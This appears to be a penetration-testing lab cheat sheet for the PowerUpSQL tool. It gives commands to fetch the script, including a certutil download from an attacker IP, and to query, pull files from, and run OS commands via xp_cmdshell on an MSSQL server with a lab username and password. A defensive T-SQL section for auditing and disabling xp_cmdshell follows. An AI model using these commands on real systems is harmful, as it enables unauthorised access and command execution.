PowerUpSQL
Import
wget https://github.com/NetSPI/PowerUpSQL/raw/master/PowerUpSQL.ps1
certutil -urlcache -f http://10.10.14.84/PowerUpSQL.ps1 PowerUpSQL.ps1
Commands
Enumerating MSSQL Instances with PowerUpSQL
Executing a query
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
Download File
Invoke-SQLDownloadFile -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -SourceFile "C:\Users\damundsen\Desktop\flag.txt" -OutputFile "C:\Users\damundsen\Desktop\flag.txt"
Execute OS commands: xp_cmdshell
Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -Command "Whoami" -Threads 10
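As an added defender-side companion to the xp_cmdshell command above (not part of PowerUpSQL or the original notes), the T-SQL below audits whether xp_cmdshell is enabled on an instance, who could reach it, and how to turn it back off; run it in the master database with a sysadmin login.

```sql
-- 1. Is xp_cmdshell enabled? value_in_use = 1 means OS command execution is live.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Who can use it: every sysadmin can call xp_cmdshell when it is enabled,
--    and commands then run as the SQL Server service account.
SELECT sp.name AS login_name, sp.type_desc
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.is_disabled = 0;

-- 3. Non-sysadmin logins need an explicit EXECUTE grant in master; list any.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM master.sys.database_permissions AS pe
JOIN master.sys.database_principals AS pr
  ON pe.grantee_principal_id = pr.principal_id
WHERE pe.major_id = OBJECT_ID('master.sys.xp_cmdshell');

-- 4. Non-sysadmins also require this proxy credential; its presence means
--    the lower-privileged path has been deliberately set up.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 5. Remediation: disable xp_cmdshell and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Re-run step 1 after the remediation block; if value_in_use returns to 1 later without a change ticket, treat it as a sign that a sysadmin login (such as the credentials used above) is being abused to re-enable it.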
GitHub
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet